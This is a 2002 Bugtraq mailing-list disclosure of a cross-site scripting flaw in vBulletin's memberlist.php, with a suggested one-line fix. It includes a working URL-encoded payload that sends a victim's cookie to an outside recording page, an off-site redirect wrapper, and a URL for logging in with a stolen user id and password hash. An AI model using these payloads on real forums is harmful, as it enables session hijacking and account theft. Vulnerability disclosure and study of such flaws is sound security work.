Bugtraq mailing list archives
memberlist.php of vBulletin
From: <plato () swgmotu com>
Date: Thu, 21 Mar 2002 19:26:36 -0500
vBulletin ALL versions Vendor status: notified 3/18/2; no response Within the first few lines of code in memberlist.php, the variable $letterbits is evaled. Because of the way PHP initializes variables, we can inject HTML, or JavaScript into the document. So by directing a user to, for example: http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocatio n%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27% 2Bescape%28document%2Ecookie%29%3C%2Fscript%3E(vbulletin.com has apparently patched their installation somehow), I can steal the users password hash and user id. Because of the way vB parses urls, the above will not function inside the forum, but if we put this in an off-site html file: <script> location = "http://www.vbulletin.com/forum/memberlist.php?letterbits=%3Cscript%3Elocati on%3D%27http%3A%2F%2Fwww%2Eswgmotu%2Ecom%2Ftests%2Frecord%2Ephp%3Fcook%3D%27 %2Bescape%28document%2Ecookie%29%3C%2Fscript%3E" </script> and then link to it instead, the exploit will work as intended...the user doesn't even have to be aware of what has transpired...the above link will proceed first to the memberlist w/cookie stealing code, and then to my <shameless plug>Star Wars Galaxies Player Association's homepage. http://www.swgmotu.com <http://www.swgmotu.com/> </shameless plug> With the recorded user id and password hash, we can access the site: http://www.vbulletin.com/forum/index.php?bbuserid=[user id]&bbpassword=[password hash] I have tried this successfully on five other users besides myself(all with consent). I believe the simplest fix would be to initialized letterbits($letterbits = "";) at the top of memberlist.php. ~Plato
Current thread:
- memberlist.php of vBulletin plato (Mar 22)
- <Possible follow-ups>
- Re: memberlist.php of vBulletin John Percival (Mar 25)